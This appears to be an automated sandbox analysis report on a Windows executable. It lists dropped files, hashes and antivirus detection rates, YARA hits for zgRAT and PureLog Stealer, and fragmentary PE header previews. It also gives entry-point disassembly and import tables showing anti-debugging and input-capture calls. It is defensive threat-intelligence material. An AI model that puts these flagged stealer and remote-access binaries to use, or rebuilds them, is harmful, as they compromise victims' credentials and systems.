                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.519109060441589
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\System32\curl.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2284739
                                                                                                                                                                        Entropy (8bit):7.490456730492454
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
                                                                                                                                                                        MD5:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                        SHA1:F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
                                                                                                                                                                        SHA-256:7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
                                                                                                                                                                        SHA-512:082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\System32\curl.exe
                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):370176
                                                                                                                                                                        Entropy (8bit):7.990824056166435
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
                                                                                                                                                                        MD5:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                        SHA1:37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
                                                                                                                                                                        SHA-256:D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
                                                                                                                                                                        SHA-512:01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j|.M.........M.;.*.q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$|(.gE.N...3.J..*T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1224
                                                                                                                                                                        Entropy (8bit):4.435108676655666
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                        MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                        SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                        SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                        SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4608
                                                                                                                                                                        Entropy (8bit):3.977686017571788
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:6OpnPtPWM7Jt8Bs3FJsdcV4MKe27iEc3s0J9vqBH6OulajfqXSfbNtm:5PBDPc+Vx9Mrlc9vkkcjRzNt
                                                                                                                                                                        MD5:5D5AE3F10CAADC375587589DABF8F147
                                                                                                                                                                        SHA1:782098228A63E5E861CDEED788F9B46D78A5E8C9
                                                                                                                                                                        SHA-256:EAA1E077716519918614BA7BF0B722BDFAE9D7E81333FF635263838984C6D291
                                                                                                                                                                        SHA-512:FA217BC6125D633A63063038F0B13B3F1FE14D8FF7DA54D8329AF101E0E98329245724DF76E83ABCAD6CF9DB89471920861BE2ADF3FB89FA30FF4DBA1B3D4E08
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID...(... ...#Blob...........WU........%3................................................................
                                                                                                                                                                        Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23
                                                                                                                                                                        Entropy (8bit):2.5600289361122233
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                                                                                                                        MD5:198AA7622D86723F12D39AA38A10C97F
                                                                                                                                                                        SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                                                                                                                        SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                                                                                                                        SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:012340..1..2..3..4.....
                                                                                                                                                                        Process:C:\Windows\System32\w32tm.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):151
                                                                                                                                                                        Entropy (8bit):4.859827078534988
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:VLV993J+miJWEoJ8FX5cUzj62Y6rMQpf6aNrv:Vx993DEU+c6G51Qpis
                                                                                                                                                                        MD5:E477C200E14E88AF5E3466E171CFBBEF
                                                                                                                                                                        SHA1:94D5CBEF534389649116BF096C61BA9D29020939
                                                                                                                                                                        SHA-256:C7429FB158C8FBA026899AD861AE291675EE6CFE9019DD37C7F9B8C65C2BD801
                                                                                                                                                                        SHA-512:DEDFF89DA333B84975BDBD6890269A3976CED8C7A426598AB5E581384DA639839621B01A6008C8635E712654D9CC8BFE03BC2E7642863864CC38A53D3E52EE87
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 15:33:20..15:33:20, error: 0x800705B4.15:33:26, error: 0x800705B4.
                                                                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                        Entropy (8bit):6.726754074912773
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:gh3zRWl4or.exe
                                                                                                                                                                        File size:637'440 bytes
                                                                                                                                                                        MD5:b172feb05a0515d00442f6ef11b167bf
                                                                                                                                                                        SHA1:7b68a6d3278644d6ffe8016b582141b67826eb96
                                                                                                                                                                        SHA256:77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2
                                                                                                                                                                        SHA512:d4fe807db84d67011fafdd3543d87fadfa589997707337f0d78a79cbf5808447e168f50f00480b20aee86ad66c9ce1260bbc3723668b11de62d8a94d58bc040a
                                                                                                                                                                        SSDEEP:12288:oKhnHFWGP9njqa8UxCj2AqeMQmHnLb6WfI:hlWGlWa8uGKFHnLb5fI
                                                                                                                                                                        TLSH:41D49D5973A58BA4D276613894BBA317F737B80817358ACB63D440642FE23E05EBB713
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0x14004d22c
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x66F0566B [Sun Sep 22 17:39:55 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:11c012ef8b8b753a6c7dfac749804464
                                                                                                                                                                        Instruction
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                        call 00007FA8486C858Ch
                                                                                                                                                                        dec eax
                                                                                                                                                                        add esp, 28h
                                                                                                                                                                        jmp 00007FA8486C7EB7h
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [esp+10h], ebx
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [esp+18h], esi
                                                                                                                                                                        push ebp
                                                                                                                                                                        push edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        push esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 10h
                                                                                                                                                                        xor eax, eax
                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                        cpuid
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov eax, ecx
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov edx, edx
                                                                                                                                                                        inc ecx
                                                                                                                                                                        xor edx, 49656E69h
                                                                                                                                                                        inc ecx
                                                                                                                                                                        xor eax, 6C65746Eh
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov ecx, ebx
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov esi, eax
                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                        cpuid
                                                                                                                                                                        inc ebp
                                                                                                                                                                        or edx, eax
                                                                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                                                                        inc ecx
                                                                                                                                                                        xor ecx, 756E6547h
                                                                                                                                                                        mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                        inc ebp
                                                                                                                                                                        or edx, ecx
                                                                                                                                                                        mov dword ptr [ebp-08h], ecx
                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                        mov dword ptr [ebp-04h], edx
                                                                                                                                                                        jne 00007FA8486C809Dh
                                                                                                                                                                        dec eax
                                                                                                                                                                        or dword ptr [00030DFDh], FFFFFFFFh
                                                                                                                                                                        and eax, 0FFF3FF0h
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [00030DE5h], 00008000h
                                                                                                                                                                        cmp eax, 000106C0h
                                                                                                                                                                        je 00007FA8486C806Ah
                                                                                                                                                                        cmp eax, 00020660h
                                                                                                                                                                        je 00007FA8486C8063h
                                                                                                                                                                        cmp eax, 00020670h
                                                                                                                                                                        je 00007FA8486C805Ch
                                                                                                                                                                        add eax, FFFCF9B0h
                                                                                                                                                                        cmp eax, 20h
                                                                                                                                                                        jnbe 00007FA8486C8066h
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ecx, 00010001h
                                                                                                                                                                        add dword ptr [eax], eax
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        dec eax
                                                                                                                                                                        bt ecx, eax
                                                                                                                                                                        jnc 00007FA8486C8056h
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov eax, dword ptr [0004D27Fh]
                                                                                                                                                                        inc ecx
                                                                                                                                                                        or eax, 01h
                                                                                                                                                                        inc esp
                                                                                                                                                                        mov dword ptr [0004D274h], eax
                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7b7e40x1a4.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x1e8.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x9b0000x2dfc.pdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x9f0000x240.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x751b00x70.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x752800x28.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x750700x140.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x500000x850.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x4e3b70x4e400c333380fa69589bce4c2278b231e8813False0.49129517771565495data6.500226352638178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x500000x2dc240x2de005dfff03f906647692a41735b724f8ad0False0.7467643051771117OpenPGP Secret Key6.927876005850988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x7e0000x1cca80x1c000539022a133f3d912fb0c10fe1d3ffa7bFalse0.4547119140625data5.38142521884376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .pdata0x9b0000x2dfc0x2e003971859f0ef1b28917191e217d625325False0.47019361413043476data5.750183579904415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x9e0000x1e80x20047073ab0f41674365afed1b0d7cc6cd5False0.54296875data4.768131151703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x9f0000x2400x4002168621d28398eccf66ad0e9459ab6ffFalse0.39453125data3.6122178639287137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_MANIFEST0x9e0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                        DLLImport
                                                                                                                                                                        d3d9.dllDirect3DCreate9Ex
                                                                                                                                                                        KERNEL32.dllVirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
                                                                                                                                                                        USER32.dllGetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
                                                                                                                                                                        ADVAPI32.dllOpenProcessToken, GetTokenInformation
                                                                                                                                                                        IMM32.dllImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
